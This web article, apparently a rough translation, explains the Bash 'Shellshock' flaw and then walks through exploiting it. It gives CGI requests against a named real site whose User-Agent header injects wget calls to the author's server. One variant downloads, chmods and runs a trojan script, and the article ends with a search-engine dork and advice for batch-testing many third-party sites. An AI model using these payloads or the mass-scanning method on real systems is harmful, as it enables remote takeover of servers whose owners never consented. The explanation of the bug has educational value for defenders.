Bash remote parsing command execution vulnerability Test Method

Bash remote parsing command execution vulnerability Test Method

 Since yesterday, the BASH remote command execution vulnerability from a vast ocean of Australia has boiling the entire FreeBuf. Everyone is talking about it, "The Heart of the Internet is bleeding again, how can I test my website? The following script

$ env x=‘() { :;}; echo vulnerable'  bash -c "echo this is a test"

Is it true that we all say this?

 

Unlike the "heartbleed" vulnerability, the "heartbleed" vulnerability can only steal user computer information, while the bash vulnerability allows hackers to remotely control the computer and obtain the highest system permissions! The method is simpler-just copy/paste a line of command code!

Why can the Bash vulnerability be executed?

Principles of Bash vulnerabilities:

 

In addition to exporting shell variables as environment variables, BASH can also export shell functions as environment variables! In the current version, bash uses the function name as the environment variable name and a string starting with "() {" as the environment variable value to export the function definition as an environment variable.

 

This vulnerability occurs when BASH processes such "function environment variables" and does not end with "}" at the end of the function. Instead, it executes the subsequent shell commands.

Simply put, the Bash script can execute the following command if a logic error occurs when parsing certain special strings.

What is the connection between Bash vulnerability and remote execution?

According to the above explanation, many children's shoes have understood the local vulnerability, and many people think that the local vulnerability can be used. Therefore, the existence of this god-level vulnerability is ignored. I would like to say that this vulnerability, the use of heat can be comparable to that of the Year's MS08-067, although the power of a little weak, but remote control of the computer is still possible.

First, explain the cgi script. Many websites are similar to the following links.

GET http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20HTTP/1.1

In the background, not only python and Perl are used to explain the execution and feedback to the client Response, but also bash scripts can be used to explain the submitted GET/POST requests. Therefore, theoretically, you insert a Bash command in an HTTP request, such

() { :;}; wget http://www.myvps.org/testvul.sh

 

If the Bash interpreter on the server has this vulnerability, the wget request will be executed when the above sentence is explained, and a malicious testvul will be executed. why should I put the sh file in the HTTP header? For example:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1 Host: help.tenpay.com User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: */*Referer: http://www.baidu.comConnection: keep-alive

This vulnerability is triggered by the bash interpreter when interpreting some special variables:
When BASH processes "function environment variables" starting with "() {", it does not end with "}" at the end of the function. Instead, it runs the subsequent shell command.
By customizing the values of these parameters in the form of "function environment variables", you can trigger Subsequent commands, malicious customers only need to send specially constructed HTTP requests to execute specific commands on the server (the command permission is the same as the Bash script environment for interpreting HTTP requests ).
In actual testing, my constructed test request:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1 Host: help.tenpay.com User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.phpAccept: */*Referer: http://www.baidu.comConnection: keep-alive

The process is as follows:
I sent a GET request-> the cgi path of the target server
When the target server parses this get request and encounters the parameter following UserAgent, the Bash interpreter executes the subsequent command.
Target Server wget-> my myvps.org
My vps records the accessed IP Address
Check the access records of my myvps.org server to check whether the target has been accessed. If yes, It is good because it has a vulnerability. The following is the wget request access log received by my VPS:

This is how we test the vulnerability.

Of course, you can also construct:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1 Host: help.tenpay.com User-Agent: () { :;}; /usr/bin/wget -O /tmp/muma.sh   ;chmod 777 /tmp/muma.sh; ./tmp/muma.shAccept: */*Referer: http://www.baidu.comConnection: keep-alive

The following three statements are actually executed:

/usr/bin/wget -O /tmp/muma.sh  http://myvps.org/muma.sh ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh

 

You will find that your Trojan script is like this, which is the essence of Bash vulnerability exploitation.

Of course, you can search by Google in batches:

filetype:cgi inurl:cgi-bin site:jp

Then you can submit similar GET requests in batches to Perform Batch testing. Tests show that 6 to 8 of the 500 URLs have the bash vulnerability.